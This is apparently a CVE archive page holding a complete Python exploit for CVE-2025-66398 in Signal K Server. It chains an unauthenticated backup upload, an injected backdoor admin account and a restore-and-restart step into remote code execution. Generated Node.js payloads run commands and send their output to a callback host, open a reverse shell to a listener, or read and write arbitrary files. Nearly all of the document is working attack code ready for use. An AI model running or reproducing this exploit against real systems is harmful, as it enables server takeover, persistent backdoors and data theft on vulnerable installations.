5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2025-66398.py PY
#!/usr/bin/env python3
# CVE-2025-66398 — Signal K RCE via State Pollution → Config Hijacking → Backdoor
# Affected: Signal K Server ≤ 2.18.0
# Impact: Unauthenticated attacker can inject a backdoor admin account and achieve RCE
# Author: Joshua van der Poll (https://github.com/joshuavanderpoll)
# Repo: https://github.com/joshuavanderpoll/cve-2025-66398
import argparse
import base64
import http.server
import io
import json
import shlex
import socket
import sys
import threading
import time
import zipfile
from urllib.parse import urlparse

import bcrypt
import requests

BANNER = (
    "\033[95m"
    r"                ___ __ ___ ___      __   __ _______ ___ "
    "\n"
    r"  ____ _____ __|_  )  \_  ) __|___ / /  / /|__ / _ ( _ )"
    "\n"
    r" / _\ V / -_)___/ / () / /|__ \___/ _ \/ _ \|_ \_, / _ "
    "\\\n"
    r" \__|\_/\___|  /___\__/___|___/   \___/\___/___//_/\___/"
    "\n"
    r"                                                        "
)
GITHUB_URL = "https://github.com/joshuavanderpoll/cve-2025-66398"

DEFAULT_USER_AGENT = (
    f"Mozilla/5.0 AppleWebKit/537.36 (CVE-2025-66398; +{GITHUB_URL})"
)
DEFAULT_TIMEOUT = 10

DEFAULT_ATTACKER = "backdoor"
DEFAULT_PASSWORD = "H4CK1nd3x!"

RCE_MODULE_DIR = "cve-2025-66398-rce"
SIGNALK_TOKENSEC_PATH = (
    "/usr/local/lib/node_modules/signalk-server/dist/tokensecurity"
)

requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

_session = requests.Session()
_session.headers["User-Agent"] = DEFAULT_USER_AGENT
_session.verify = False
_timeout = DEFAULT_TIMEOUT
_target_os = "linux"
_signalk_dir_override = None


def _os_tokensec():
    """Path to the Signal K tokensecurity module on the target OS."""
    if _target_os == "windows":
        return (
            "C:/Users/signalk/AppData/Roaming/npm"
            "/node_modules/signalk-server/dist/tokensecurity"
        )
    return SIGNALK_TOKENSEC_PATH


def _os_data_dir():
    """Signal K user data directory on the target OS."""
    if _signalk_dir_override:
        return _signalk_dir_override.rstrip("/").rstrip("\\")
    return None


def _os_shell_spawn():
    """Return (binary, args_list) for the reverse-shell process on the target OS."""
    if _target_os == "windows":
        return "cmd.exe", []
    return "/bin/sh", ["-i"]


def _os_read_cmd(remote_path):
    """Shell command to read a file on the target OS."""
    if _target_os == "windows":
        return f"type {remote_path}"
    return f"cat {shlex.quote(remote_path)}"


def _os_write_cmd(content, remote_path):
    """Shell command to write content to remote_path on the target OS."""
    b64 = base64.b64encode(content.encode()).decode()
    if _target_os == "windows":
        safe_path = remote_path.replace("'", "''")
        return (
            f"powershell -NoP -NonI -W Hidden -C "
            f"\"[IO.File]::WriteAllBytes('{safe_path}',"
            f"[Convert]::FromBase64String('{b64}'))\" && echo written"
        )
    return (
        f"echo {shlex.quote(b64)} | base64 -d > {shlex.quote(remote_path)}"
        " && echo written"
    )


def ok(msg):
    """Print *msg* as a success line, prefixed with a green ``[+]`` tag."""
    tag = "\033[92m[+]\033[0m"
    print(f"  {tag} {msg}")


def info(msg):
    """Print *msg* as an informational line, prefixed with a blue ``[*]`` tag."""
    tag = "\033[94m[*]\033[0m"
    print(f"  {tag} {msg}")


def warn(msg):
    """Print *msg* as a warning line, prefixed with a yellow ``[@]`` tag."""
    tag = "\033[93m[@]\033[0m"
    print(f"  {tag} {msg}")


def err(msg):
    """Print *msg* as an error line, prefixed with a red ``[-]`` tag."""
    tag = "\033[91m[-]\033[0m"
    print(f"  {tag} {msg}")


def prompt(msg, default=None):
    """Ask the user for a line of input and return it stripped.

    A truthy *default* is shown in square brackets after the question and is
    returned when the user enters nothing (or only whitespace). Ctrl-C or
    end-of-input prints a newline and exits the process with status 0.
    """
    hint = ""
    if default:
        hint = f" [{default}]"

    question = f"  \033[96m[?]\033[0m {msg}{hint}: "

    try:
        answer = input(question).strip()
    except (KeyboardInterrupt, EOFError):
        print()
        sys.exit(0)

    # An empty answer falls back to the default (which may itself be None).
    return answer or default


def confirm(msg):
    """Ask a yes/no question and return True only for ``y`` or ``yes``.

    The answer is stripped and compared case-insensitively; anything else,
    including an empty answer, counts as "no". Ctrl-C or end-of-input prints
    a newline and exits the process with status 0.
    """
    question = f"  \033[96m[?]\033[0m {msg} [y/N]: "

    try:
        reply = input(question).strip().lower()
    except (KeyboardInterrupt, EOFError):
        print()
        sys.exit(0)

    return reply == "y" or reply == "yes"


def normalise_target(raw):
    """Return *raw* as a base URL with a scheme and no trailing slash.

    Surrounding whitespace and trailing ``/`` characters are removed. If the
    value does not already start with ``http://`` or ``https://`` (compared
    case-insensitively), ``http://`` is prepended.

    The full ``scheme://`` prefix is checked rather than just ``"http"``, so
    a bare host whose name happens to begin with "http" (for example
    ``httpbin.local:3000``) still gets a scheme, and an upper-case scheme is
    not prefixed a second time.
    """
    raw = raw.strip().rstrip("/")

    if not raw.lower().startswith(("http://", "https://")):
        raw = "http://" + raw

    return raw


def login(target, username, password):
    try:
        res = _session.post(
            f"{target}/signalk/v1/auth/login",
            json={"username": username, "password": password},
            timeout=_timeout,
        )

        if res.status_code == 200:
            return res.json().get("token")

    except requests.ConnectionError:
        pass

    return None


def _print_server_info(target, res):
    parsed = urlparse(target)
    info(f"Target         : {parsed.scheme}://{parsed.netloc}")
    info(f"Target OS      : {_target_os}")

    server_hdr = res.headers.get("Server") or res.headers.get("X-Powered-By")
    if server_hdr:
        info(f"Server header  : {server_hdr}")

    try:
        data = res.json()
        # Discovery endpoint: {"server": {"id": ..., "version": ...}, "endpoints": {...}}
        srv = data.get("server") or {}
        version = srv.get("version") or (
            (list(data.get("endpoints", {}).values()) or [{}])[0].get("version")
        )
        if version:
            ok(f"Detected version: Signal K Server {version}")
        srv_id = srv.get("id")
        if srv_id:
            info(f"Server ID      : {srv_id}")
    except Exception:
        pass


def check_reachable(target):
    try:
        res = _session.get(target, timeout=_timeout)
        _print_server_info(target, res)
        return True

    except requests.ConnectionError:
        err(f"Could not reach {target}. Is the server running?")
        sys.exit(1)

    except requests.Timeout:
        err(f"Timed out connecting to {target}.")
        sys.exit(1)


def do_check(target):
    info("Checking if target is vulnerable to CVE-2025-66398 ...")
    print()

    zip_buffer = io.BytesIO()

    with zipfile.ZipFile(zip_buffer, "w") as z:
        z.writestr(
            "security.json",
            json.dumps({"users": [], "devices": [], "immutableConfig": False, "acls": []}),
        )

    zip_buffer.seek(0)

    try:
        res = _session.post(
            f"{target}/skServer/validateBackup",
            files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        sys.exit(1)

    if res.status_code == 200:
        ok("Target is VULNERABLE — /skServer/validateBackup accepts unauthenticated uploads.")
        try:
            data = res.json()
            restore_path = (
                data.get("restoreFilePath") or data.get("filePath") or data.get("path")
            )
            if restore_path:
                ok(f"restoreFilePath : {restore_path}")
        except Exception:
            pass
    elif res.status_code == 401:
        ok("Target appears PATCHED — endpoint requires authentication (HTTP 401).")
    else:
        warn(f"Unexpected response: HTTP {res.status_code}. Target may or may not be vulnerable.")

    print()


def do_pollute(target, attacker_name, attacker_pass):
    global _signalk_dir_override
    print()
    info("Phase 1 of 3 -- State Pollution")
    info(f"Backdoor account to inject  : {attacker_name}")
    info(f"Backdoor password to inject : {attacker_pass}")
    print()

    info("Hashing password with bcrypt ...")
    hashed = bcrypt.hashpw(attacker_pass.encode(), bcrypt.gensalt(rounds=10)).decode()

    zip_buffer = io.BytesIO()

    with zipfile.ZipFile(zip_buffer, "w") as z:
        security_config = {
            "users": [
                {
                    "username": attacker_name,
                    "password": hashed,
                    "type": "admin",
                }
            ],
            "devices": [],
            "immutableConfig": False,
            "acls": [],
        }
        z.writestr("security.json", json.dumps(security_config))

    zip_buffer.seek(0)

    info("Uploading malicious backup to /skServer/validateBackup ...")

    try:
        res = _session.post(
            f"{target}/skServer/validateBackup",
            files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}. Is the server running?")
        sys.exit(1)

    if res.status_code != 200:
        err(f"Upload failed -- HTTP {res.status_code}: {res.text}")
        sys.exit(1)

    ok("Malicious zip accepted. Server restoreFilePath is now poisoned.")
    try:
        data = res.json()
        restore_path = data.get("restoreFilePath") or data.get("filePath") or data.get("path")
        if restore_path:
            ok(f"restoreFilePath : {restore_path}")
            if not _signalk_dir_override:
                # restoreFilePath is typically <datadir>/backups/tmp-xxx.backup or
                # <datadir>/tmp-xxx.backup — walk up until we leave a known sub-dir.
                norm = restore_path.replace("\\", "/")
                parts = norm.rsplit("/", 1)[0]  # strip filename
                _KNOWN_SUB = {"backups", "tmp", "uploads", "restore"}
                while parts and parts.split("/")[-1].lower() in _KNOWN_SUB:
                    parts = parts.rsplit("/", 1)[0]
                if parts and parts != ".":
                    _signalk_dir_override = parts
                    ok(f"Auto-detected data dir: {parts}")
        files = data.get("files")
        if files:
            ok(f"Accepted files  : {', '.join(files)}")
    except Exception:
        pass
    print()
    warn("-- Next step --")
    warn("  Trigger the restore as a logged-in admin (Phase 2), then")
    warn("  restart the server so it loads the new config.")
    warn("  Once the backdoor account is active, proceed to Phase 3 (RCE).")
    print()


def do_restore(target, admin_name, admin_pass):
    global _signalk_dir_override
    print()
    info("Phase 2 of 3 -- Config Hijacking via /restore")

    while True:
        info(f"Authenticating as admin: {admin_name}")
        token = login(target, admin_name, admin_pass)

        if token:
            break

        err("Admin login failed. Wrong username or password.")
        warn("  Hint: if you already ran the exploit earlier,")
        warn("        try the backdoor credentials you injected instead.")

        if not confirm("Try again with different credentials?"):
            sys.exit(0)

        admin_name = prompt("Admin username", default=admin_name)
        admin_pass = prompt("Admin password")

    ok("Admin login successful.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore endpoint with poisoned backup ...")

    headers = {"Authorization": f"Bearer {token}"}

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json={"security.json": True},
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        sys.exit(1)

    if res.status_code in (200, 202):
        ok("Restore triggered -- backdoor account written to disk.")
        try:
            data = res.json()
            restored = data.get("restored") or data.get("files") or data.get("written")
            if restored:
                ok(f"Restored files  : {restored}")
            cfg_path = data.get("configPath") or data.get("path")
            if cfg_path:
                ok(f"Config path     : {cfg_path}")
                if not _signalk_dir_override:
                    detected = cfg_path.replace("\\", "/").rsplit("/", 1)[0]
                    if detected and detected != ".":
                        _signalk_dir_override = detected
                        ok(f"Auto-detected data dir: {detected}")
        except Exception:
            pass
    else:
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        sys.exit(1)

    print()


def reboot_as_user(target, admin_name, admin_pass):
    info(f"Logging in as {admin_name} ...")
    token = login(target, admin_name, admin_pass)

    if not token:
        err("Login failed. Check credentials.")
        warn("  Hint: if the exploit already ran successfully, try the backdoor")
        warn("        username and password you injected in Phase 1.")
        return

    ok("Logged in.")
    info("Sending restart request ...")

    headers = {"Authorization": f"Bearer {token}"}

    try:
        res = _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        return

    if res.status_code in (200, 202):
        ok("Restart request accepted. Waiting for server to come back up ...")
        _wait_for_server(target)
    else:
        err(f"Restart failed -- HTTP {res.status_code}: {res.text}")


def _wait_for_server(target, attempts=20, delay=2):
    for i in range(attempts):
        time.sleep(delay)

        try:
            _session.get(target, timeout=_timeout)
            ok("Server is back online.")
            return
        except Exception:
            print(f"  \033[90m[@]\033[0m Waiting ... ({i + 1}/{attempts})", end="\r")

    print()
    warn("Server did not come back within the timeout. Check it manually.")


def _command_js(callback_host, callback_port, command):
    return (
        "'use strict';\n"
        "var cp = require('child_process');\n"
        f"cp.exec({json.dumps(command)}, function(err, stdout, stderr) {{\n"
        "  var out = (stdout || stderr || (err ? err.message : '(no output)')).trim();\n"
        "  var http = require('http');\n"
        f"  var opts = {{hostname: {json.dumps(callback_host)}, port: {callback_port},\n"
        "    method: 'POST', path: '/',\n"
        "    headers: {'Content-Type': 'text/plain',\n"
        "              'Content-Length': Buffer.byteLength(out)}};\n"
        "  var req = http.request(opts, function() {});\n"
        "  req.on('error', function() {});\n"
        "  req.write(out); req.end();\n"
        "});\n"
        f"module.exports = require({json.dumps(_os_tokensec())});\n"
    )


def _shell_js(lhost, lport):
    shell_bin, shell_args = _os_shell_spawn()
    return (
        "'use strict';\n"
        "var net = require('net');\n"
        "var cp = require('child_process');\n"
        f"var sh = cp.spawn({json.dumps(shell_bin)}, {json.dumps(shell_args)});\n"
        "var c = new net.Socket();\n"
        f"c.connect({lport}, {json.dumps(lhost)}, function() {{\n"
        "  c.pipe(sh.stdin);\n"
        "  sh.stdout.pipe(c);\n"
        "  sh.stderr.pipe(c);\n"
        "  c.on('close', function() { sh.kill(); });\n"
        "});\n"
        f"module.exports = require({json.dumps(_os_tokensec())});\n"
    )


def _code_js(raw_code):
    return (
        "'use strict';\n"
        f"{raw_code}\n"
        f"module.exports = require({json.dumps(_os_tokensec())});\n"
    )


def _upload_rce_zip(target, attacker_name, attacker_pass, evil_js):
    hashed = bcrypt.hashpw(attacker_pass.encode(), bcrypt.gensalt(rounds=10)).decode()

    data_dir = _os_data_dir()
    if not data_dir:
        err("Signal K data directory is not set.")
        err("  Use -signalk-dir <path> or let Phase 2 auto-detect it.")
        err("  WARNING: a wrong path will corrupt the Signal K server config and service.")
        return False

    security_config = {
        "users": [{"username": attacker_name, "password": hashed, "type": "admin"}],
        "devices": [],
        "immutableConfig": False,
        "acls": [],
    }

    settings_config = {
        "security": {"strategy": f"{data_dir}/{RCE_MODULE_DIR}"},
    }

    zip_buffer = io.BytesIO()

    with zipfile.ZipFile(zip_buffer, "w") as z:
        z.writestr("security.json", json.dumps(security_config))
        z.writestr("settings.json", json.dumps(settings_config))
        # Directory entry — listSafeRestoreFiles allows directories unconditionally
        z.writestr(zipfile.ZipInfo(f"{RCE_MODULE_DIR}/"), "")
        z.writestr(f"{RCE_MODULE_DIR}/index.js", evil_js)

    zip_buffer.seek(0)

    try:
        res = _session.post(
            f"{target}/skServer/validateBackup",
            files={"file": ("signalk-backup.backup", zip_buffer, "application/zip")},
            timeout=_timeout,
        )
    except requests.ConnectionError:
        return False

    return res.status_code == 200


def try_rce(target, attacker_name, attacker_pass, admin_name, admin_pass, command):
    print()
    info("Phase 3 of 3 -- Remote Code Execution (security strategy injection)")

    # Grab a free ephemeral port for the callback listener
    with socket.socket() as s:
        s.bind(("", 0))
        callback_port = s.getsockname()[1]

    result = {"output": None}
    received = threading.Event()

    class _Handler(http.server.BaseHTTPRequestHandler):
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length).decode("utf-8", errors="replace")
            result["output"] = body
            self.send_response(200)
            self.end_headers()
            received.set()

        def log_message(self, *_):
            pass

    srv = http.server.HTTPServer(("", callback_port), _Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    info(f"Callback listener started on port {callback_port}.")

    # Use host.docker.internal when targeting localhost (Docker Desktop)
    parsed = urlparse(target)

    if parsed.hostname in ("localhost", "127.0.0.1", "::1"):
        callback_host = "host.docker.internal"
    else:
        callback_host = parsed.hostname

    info(f"Callback host  : {callback_host}")

    info("Building and uploading RCE payload ...")

    js = _command_js(callback_host, callback_port, command)

    if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
        err("RCE zip upload failed.")
        srv.shutdown()
        return False

    ok("RCE zip accepted by server.")

    # Try backdoor first, fall back to the supplied admin account
    token = login(target, attacker_name, attacker_pass)

    if token:
        restore_as = attacker_name
    elif admin_name:
        token = login(target, admin_name, admin_pass)
        restore_as = admin_name
    else:
        token = None

    if not token:
        err(
            "Cannot authenticate to trigger restore. "
            "Restart the server first (option 2), then retry."
        )
        srv.shutdown()
        return False

    ok(f"Authenticated as {restore_as}.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore with RCE payload ...")

    headers = {"Authorization": f"Bearer {token}"}
    restore_body = {
        "security.json": True,
        "settings.json": True,
        f"{RCE_MODULE_DIR}/": True,
    }

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json=restore_body,
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        srv.shutdown()
        return False

    if res.status_code not in (200, 202):
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        srv.shutdown()
        return False

    ok("Payload written to disk.")
    try:
        data = res.json()
        restored = data.get("restored") or data.get("files") or data.get("written")
        if restored:
            ok(f"Restored files  : {restored}")
        cfg_path = data.get("configPath") or data.get("path")
        if cfg_path:
            ok(f"Config path     : {cfg_path}")
    except Exception:
        pass
    info("Restarting server ...")

    # Re-authenticate — restore may have invalidated the old session
    token = login(target, attacker_name, attacker_pass)

    if not token and admin_name:
        token = login(target, admin_name, admin_pass)

    if not token:
        warn("Could not re-authenticate for restart. Restart the server manually.")
    else:
        headers = {"Authorization": f"Bearer {token}"}

        try:
            _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
        except (requests.Timeout, requests.ConnectionError):
            pass  # restart disconnects the socket — expected

    _wait_for_server(target)

    info("Waiting up to 15 s for command output callback ...")
    got_it = received.wait(timeout=15)
    srv.shutdown()

    if got_it:
        print()
        ok("Command output received:")
        print("  " + "─" * 60)

        for line in (result["output"] or "").splitlines():
            print(f"  {line}")

        print("  " + "─" * 60)
        print()
        print(
            f"  \033[93m⭐ If this tool helped you, consider starring the repo: "
            f"\033[0m\033[1m{GITHUB_URL}\033[0m"
        )
        print()
        return True

    else:
        warn("No callback received within timeout.")
        warn(f"  Expected callback at: http://{callback_host}:{callback_port}/")
        warn("  The container may not be able to reach that address.")
        warn("  Check that host.docker.internal resolves inside the container,")
        warn("  or set a custom callback host via the code.")
        print()
        return False


def try_shell(target, attacker_name, attacker_pass, admin_name, admin_pass, lhost, lport):
    print()
    info("Phase 3 of 3 -- Reverse Shell (Node.js socket shell)")
    info(f"Listener       : {lhost}:{lport}")
    info(f"Catch with     : nc -lvnp {lport}")
    print()

    js = _shell_js(lhost, lport)

    if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
        err("Shell zip upload failed.")
        return False

    ok("Shell zip accepted by server.")

    token = login(target, attacker_name, attacker_pass)

    if token:
        restore_as = attacker_name
    elif admin_name:
        token = login(target, admin_name, admin_pass)
        restore_as = admin_name
    else:
        token = None

    if not token:
        err(
            "Cannot authenticate to trigger restore. "
            "Restart the server first (option 2), then retry."
        )
        return False

    ok(f"Authenticated as {restore_as}.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore with shell payload ...")

    headers = {"Authorization": f"Bearer {token}"}
    restore_body = {
        "security.json": True,
        "settings.json": True,
        f"{RCE_MODULE_DIR}/": True,
    }

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json=restore_body,
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        return False

    if res.status_code not in (200, 202):
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        return False

    ok("Payload written to disk.")
    info("Restarting server — shell will connect back on module load ...")

    token = login(target, attacker_name, attacker_pass)

    if not token and admin_name:
        token = login(target, admin_name, admin_pass)

    if token:
        headers = {"Authorization": f"Bearer {token}"}

        try:
            _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
        except (requests.Timeout, requests.ConnectionError):
            pass

    _wait_for_server(target)
    ok(f"Server back online. Shell should connect to {lhost}:{lport}.")
    return True


def try_code(target, attacker_name, attacker_pass, admin_name, admin_pass, raw_code):
    print()
    info("Phase 3 of 3 -- Code Injection (raw Node.js module)")
    print()

    js = _code_js(raw_code)

    if not _upload_rce_zip(target, attacker_name, attacker_pass, js):
        err("Code zip upload failed.")
        return False

    ok("Code zip accepted by server.")

    token = login(target, attacker_name, attacker_pass)

    if token:
        restore_as = attacker_name
    elif admin_name:
        token = login(target, admin_name, admin_pass)
        restore_as = admin_name
    else:
        token = None

    if not token:
        err(
            "Cannot authenticate to trigger restore. "
            "Restart the server first (option 2), then retry."
        )
        return False

    ok(f"Authenticated as {restore_as}.")
    ok(f"Session token  : {token[:40]}...")
    info("Triggering restore with code payload ...")

    headers = {"Authorization": f"Bearer {token}"}
    restore_body = {
        "security.json": True,
        "settings.json": True,
        f"{RCE_MODULE_DIR}/": True,
    }

    try:
        res = _session.post(
            f"{target}/skServer/restore",
            json=restore_body,
            headers=headers,
            timeout=_timeout,
        )
    except requests.ConnectionError:
        err(f"Could not reach {target}.")
        return False

    if res.status_code not in (200, 202):
        err(f"Restore failed -- HTTP {res.status_code}: {res.text}")
        return False

    ok("Payload written to disk.")
    info("Restarting server — injected code runs on module load ...")

    token = login(target, attacker_name, attacker_pass)

    if not token and admin_name:
        token = login(target, admin_name, admin_pass)

    if token:
        headers = {"Authorization": f"Bearer {token}"}

        try:
            _session.put(f"{target}/skServer/restart", headers=headers, timeout=_timeout)
        except (requests.Timeout, requests.ConnectionError):
            pass

    _wait_for_server(target)
    ok("Server back online. Code executed on module load.")
    return True


def restart_menu(target, attacker_name, attacker_pass, admin_name=None, admin_pass=None):
    while True:
        print()
        print("  \033[1mWhat do you want to do next?\033[0m")
        print("    1) Try exploit     (attempt RCE as backdoor user)")
        print("    2) Reboot as user  (trigger server restart via admin creds)")
        print("    3) Exit")
        print()

        try:
            choice = input("  \033[96m[?]\033[0m Choose [1/2/3]: ").strip()
        except (KeyboardInterrupt, EOFError):
            print()
            sys.exit(0)

        if choice == "1":
            cmd = prompt("Command to run on the server", default="id")
            succeeded = try_rce(
                target, attacker_name, attacker_pass, admin_name, admin_pass, cmd
            )

            if not succeeded:
                warn("RCE failed -- see hints above.")

        elif choice == "2":
            admin_name = prompt("Admin username", default=admin_name)
            admin_pass = prompt("Admin password", default=admin_pass)

            if not admin_name or not admin_pass:
                err("Username and password are required.")
                continue

            reboot_as_user(target, admin_name, admin_pass)

        elif choice == "3":
            info("Exiting.")
            sys.exit(0)

        else:
            warn("Invalid choice. Enter 1, 2 or 3.")


def interactive_mode(preset_target=None):
    global _signalk_dir_override
    print()

    if preset_target:
        target = normalise_target(preset_target)
        info(f"Target set to: {target}")
    else:
        raw = prompt("Target Signal K server")
        target = normalise_target(raw)
        info(f"Target set to: {target}")

    check_reachable(target)

    print()
    attacker_name = prompt("Backdoor username to inject", default=DEFAULT_ATTACKER)
    attacker_pass = prompt("Backdoor password to inject", default=DEFAULT_PASSWORD)

    print()
    info("Phase 1: State Pollution")
    info(f"  Uploads a malicious .backup file to {target}/skServer/validateBackup")
    info(f"  Embeds a backdoor admin account ({attacker_name}) into the restore state.")
    info("  No authentication required.")
    print()

    if not confirm("Continue with pollution?"):
        info("Aborted.")
        sys.exit(0)

    do_pollute(target, attacker_name, attacker_pass)

    print()
    info("Phase 2: Config Hijacking")
    info("  The server must restore from the poisoned backup and then restart")
    info("  before the backdoor account becomes active.")
    print()

    if confirm("Do you have admin credentials to trigger the restore now?"):
        admin_name = prompt("Admin username")
        admin_pass = prompt("Admin password")
        do_restore(target, admin_name, admin_pass)
        if not _signalk_dir_override:
            warn("Could not auto-detect the Signal K data directory from restore response.")
            print()
            err("  !! A wrong path will BREAK the Signal K server — it will fail to start !!")
            custom = prompt("Signal K data dir on target (required)")
            if not custom:
                err("Data directory is required to continue. Aborting.")
                sys.exit(1)
            _signalk_dir_override = custom
    else:
        admin_name = None
        admin_pass = None
        warn(
            "Waiting for a legitimate admin to trigger restore, "
            "or restart the server manually."
        )
        print()
        err("  !! A wrong path will BREAK the Signal K server — it will fail to start !!")
        custom = prompt("Signal K data dir on target (required)")
        if not custom:
            err("Data directory is required to continue. Aborting.")
            sys.exit(1)
        _signalk_dir_override = custom

    restart_menu(
        target,
        attacker_name,
        attacker_pass,
        admin_name=admin_name,
        admin_pass=admin_pass,
    )


def run_noninteractive(args, target):
    backdoor_name = args.backdoor_user
    backdoor_pass = args.backdoor_pass
    admin_name = args.admin_user
    admin_pass = args.admin_pass

    if args.check:
        do_check(target)
        return

    if args.shell and (not args.lhost or not args.lport):
        err("-shell requires -lhost and -lport.")
        sys.exit(1)

    needs_phase3 = any([args.read_file, args.write_file, args.command, args.code, args.shell])

    if admin_name and admin_pass:
        do_pollute(target, backdoor_name, backdoor_pass)
        do_restore(target, admin_name, admin_pass)
        reboot_as_user(target, admin_name, admin_pass)
    else:
        warn("No admin credentials provided — skipping Phases 1 and 2.")
        warn("  Use -admin-user and -admin-pass to run the full exploit chain.")
        warn("  Assuming backdoor account is already active from a previous run.")
        print()

    if needs_phase3 and not _signalk_dir_override:
        err("Signal K data directory is required for Phase 3 but was not set.")
        err("  Run Phase 2 first (auto-detects the path), or pass -signalk-dir <path>.")
        err("  WARNING: a wrong path will corrupt the Signal K server config.")
        sys.exit(1)

    if args.read_file:
        try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass,
                _os_read_cmd(args.read_file))
    elif args.write_file:
        try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass,
                _os_write_cmd(args.write_file[0], args.write_file[1]))
    elif args.command:
        try_rce(target, backdoor_name, backdoor_pass, admin_name, admin_pass, args.command)
    elif args.code:
        try_code(target, backdoor_name, backdoor_pass, admin_name, admin_pass, args.code)
    elif args.shell:
        try_shell(
            target, backdoor_name, backdoor_pass, admin_name, admin_pass,
            args.lhost, args.lport,
        )


def build_parser():
    parser = argparse.ArgumentParser(
        prog="exp.py",
        description="CVE-2025-66398 -- Signal K State Pollution -> Backdoor -> RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        add_help=True,
    )
    parser.add_argument(
        "-target",
        metavar="URL",
        default=None,
        help="Base URL of the Signal K server",
    )
    parser.add_argument(
        "-useragent",
        metavar="UA",
        default=DEFAULT_USER_AGENT,
        help="User-Agent header for all HTTP requests",
    )
    parser.add_argument(
        "-timeout",
        metavar="SEC",
        type=int,
        default=DEFAULT_TIMEOUT,
        help=f"Request timeout in seconds (default: {DEFAULT_TIMEOUT})",
    )
    parser.add_argument(
        "-target-os",
        metavar="OS",
        choices=["linux", "windows"],
        default="linux",
        help="Target server OS for payload/path adaptation: linux (default) or windows",
    )
    parser.add_argument(
        "-signalk-dir",
        metavar="DIR",
        default=None,
        help="Override the Signal K data directory on the target (default: OS-dependent)",
    )
    parser.add_argument(
        "-check",
        action="store_true",
        help="Test if the target is vulnerable without exploiting it",
    )
    parser.add_argument("-admin-user", metavar="USER", default=None, help="Admin username for Phase 2 restore")
    parser.add_argument("-admin-pass", metavar="PASS", default=None, help="Admin password for Phase 2 restore")
    parser.add_argument(
        "-backdoor-user",
        metavar="USER",
        default=DEFAULT_ATTACKER,
        help=f"Backdoor username to inject (default: {DEFAULT_ATTACKER})",
    )
    parser.add_argument(
        "-backdoor-pass",
        metavar="PASS",
        default=DEFAULT_PASSWORD,
        help=f"Backdoor password to inject (default: {DEFAULT_PASSWORD})",
    )
    parser.add_argument("-command", metavar="CMD", default=None, help="Execute a command on the server (non-interactive)")
    parser.add_argument("-read-file", metavar="PATH", default=None, help="Read a remote file via RCE")
    parser.add_argument(
        "-write-file",
        nargs=2,
        metavar=("CONTENT", "PATH"),
        default=None,
        help="Write CONTENT to PATH on the server via RCE",
    )
    parser.add_argument("-code", metavar="CODE", default=None, help="Inject raw Node.js code as the security module")
    parser.add_argument("-shell", action="store_true", help="Deploy a reverse shell (requires -lhost and -lport)")
    parser.add_argument("-lhost", metavar="HOST", default=None, help="Listener host for reverse shell")
    parser.add_argument("-lport", metavar="PORT", type=int, default=None, help="Listener port for reverse shell")

    return parser


def main():
    global _timeout, _target_os, _signalk_dir_override
    print(BANNER)
    print(f"  \033[95m\033[1m{GITHUB_URL}\033[0m")
    print()
    parser = build_parser()
    args = parser.parse_args()
    _session.headers["User-Agent"] = args.useragent
    _timeout = args.timeout
    _target_os = args.target_os
    _signalk_dir_override = args.signalk_dir

    non_interactive = any([
        args.check,
        args.command,
        args.read_file,
        args.write_file,
        args.code,
        args.shell,
    ])

    if non_interactive:
        if not args.target:
            err("-target is required.")
            sys.exit(1)
        target = normalise_target(args.target)
        check_reachable(target)
        run_noninteractive(args, target)
    else:
        interactive_mode(preset_target=args.target)


if __name__ == "__main__":
    main()